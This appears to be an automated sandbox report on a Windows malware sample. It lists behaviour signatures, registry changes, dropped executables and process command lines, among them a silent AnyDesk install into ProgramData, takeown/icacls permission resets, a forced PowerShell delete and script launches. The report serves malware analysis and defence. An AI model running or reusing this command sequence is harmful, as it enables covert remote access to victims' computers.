Analysis Overview
SHA256
b969e4d3c6f3e6a787b6c45f0dd418da1aab11bfffb552c1eaa8c7fc5e23a34b
Threat Level: Likely malicious
The file 2aazV5 was found to be: Likely malicious.
Malicious Activity Summary
Disables Task Manager via registry modification
Command and Scripting Interpreter: PowerShell
Possible privilege escalation attempt
Loads dropped DLL
Modifies file permissions
Executes dropped EXE
Checks installed software on the system
Drops file in System32 directory
Enumerates physical storage devices
Delays execution with timeout.exe
Suspicious behavior: EnumeratesProcesses
Modifies registry key
Suspicious use of WriteProcessMemory
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
NTFS ADS
Enumerates system info in registry
Suspicious use of SetWindowsHookEx
Suspicious behavior: AddClipboardFormatListener
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Views/modifies file attributes
Uses Task Scheduler COM API
Suspicious use of SendNotifyMessage
Creates scheduled task(s)
Modifies data under HKEY_USERS
Checks processor information in registry
Modifies registry class
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-07 19:24
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-07 19:24
Reported
2024-06-07 21:19
Platform
win11-20240508-en
Max time kernel
1041s
Max time network
1037s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Disables Task Manager via registry modification
Possible privilege escalation attempt
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\Goonscript.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\doorbell-upd.exe | N/A |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\locked.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
| N/A | N/A | C:\ProgramData\Anydesk.exe | N/A |
| N/A | N/A | C:\ProgramData\stn.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
| N/A | N/A | C:\ProgramData\Anydesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\Anydesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
Modifies file permissions
Checks installed software on the system
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide_alternate.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AnyDesk\user.conf | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_768.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1280.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_sr.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_custom_stream.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AnyDesk\ad.trace | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_2560.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AnyDesk\ad.trace | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_96.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1920.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_exif.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AnyDesk\user.conf | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db | C:\ProgramData\Anydesk.exe | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\ProgramData\Anydesk.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\ProgramData\Anydesk.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\ProgramData\Anydesk.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Moniker = "cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Children | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe\Children | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command\ = "\"C:\\ProgramData\\AnyDesk.exe\" --play \"%1\"" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\ = "URL:AnyDesk Protocol" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon\ = "AnyDesk.exe,0" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\DisplayName = "Chrome Sandbox" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3001105534-2705918504-2956618779-1000\{835C56AD-271E-4BAB-BE77-1634B251AB8A} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon\ = "\"C:\\ProgramData\\AnyDesk.exe\",0" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\URL Protocol | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command\ = "\"C:\\ProgramData\\AnyDesk.exe\" \"%1\"" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 790594.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Goonscript.exe:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\Goonscript.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\2aazV5.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd9ea73cb8,0x7ffd9ea73cc8,0x7ffd9ea73cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1912 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2608 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3188 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3196 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4632 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=4848 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=media.mojom.MediaService --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --service-sandbox-type=mf_cdm --mojo-platform-channel-handle=4660 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5516 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5664 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5768 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5776 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6060 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5880 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6028 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4092 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5540 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6208 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5800 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3484 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4812 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4924 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3140 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6908 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6732 /prefetch:8
C:\Users\Admin\Downloads\Goonscript.exe
"C:\Users\Admin\Downloads\Goonscript.exe"
C:\Windows\system32\wscript.exe
"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\A067.tmp\A068.tmp\A079.vbs //Nologo
C:\Users\Admin\AppData\Roaming\doorbell-upd.exe
"C:\Users\Admin\AppData\Roaming\doorbell-upd.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A365.tmp\A366.tmp\A367.bat C:\Users\Admin\AppData\Roaming\doorbell-upd.exe"
C:\Windows\system32\takeown.exe
takeown /f "C:\programdata\stn.exe"
C:\Windows\system32\icacls.exe
icacls "C:\programdata\stn.exe" /reset
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "C:\programdata\stn.exe" -r -force
\??\c:\users\Admin\downloads\AnyDesk.exe
"c:/users/Admin/downloads/Anydesk.exe" --install "C:\ProgramData" --silent
\??\c:\users\Admin\downloads\AnyDesk.exe
"c:\users\Admin\downloads\AnyDesk.exe" --local-service
\??\c:\users\Admin\downloads\AnyDesk.exe
"c:\users\Admin\downloads\AnyDesk.exe" --local-control
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://ctt.ac/Y6e79
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
